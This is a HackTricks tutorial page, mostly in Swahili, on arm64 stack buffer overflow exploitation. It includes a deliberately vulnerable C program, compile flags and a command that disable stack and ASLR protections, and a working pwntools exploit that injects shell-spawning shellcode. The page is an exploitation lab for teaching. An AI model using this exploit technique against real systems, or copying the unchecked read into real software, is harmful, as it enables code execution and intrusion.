HackTricksStack Shellcode - arm64
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Pata utangulizi kuhusu arm64 katika:
Linux
Code
#include <stdio.h>
#include <unistd.h>
void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}
int main() {
vulnerable_function();
return 0;
}
Kompaili bila pie, canary na nx:
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
Hakuna ASLR & Hakuna canary - Stack Overflow
Ili kuzima ASLR tekeleza:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
Ili kupata offset ya bof angalia kiungo hiki.
Exploit:
from pwn import *
# Load the binary
binary_name = './bof'
elf = context.binary = ELF(binary_name)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Start the process
p = process(binary_name)
# Offset to return address
offset = 72
# Address in the stack after the return address
ret_address = p64(0xfffffffff1a0)
# Craft the payload
payload = b'A' * offset + ret_address + shellcode
print("Payload length: "+ str(len(payload)))
# Send the payload
p.send(payload)
# Drop to an interactive session
p.interactive()
Jambo pekee "ngumu" la kupata hapa ni anwani kwenye stack ya kuitwa. Katika kesi yangu nilitengeneza exploit kwa kutumia anwani niliyopata kwa gdb, lakini wakati wa kui-exploit haikufanya kazi (kwa sababu anwani ya stack ilibadilika kidogo).
Nilifungua generated core file (gdb ./bog ./core) na kukagua anwani halisi ya mwanzo wa shellcode.
macOS
tip
Hawezekani kuzima NX kwenye macOS kwa sababu kwenye arm64 modi hii imetekelezwa kwenye ngazi ya hardware, hivyo hutaweza kuizima — hivyo hautapata mifano yenye shellcode kwenye stack kwenye macOS.
Angalia mfano wa macOS ret2win katika:
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.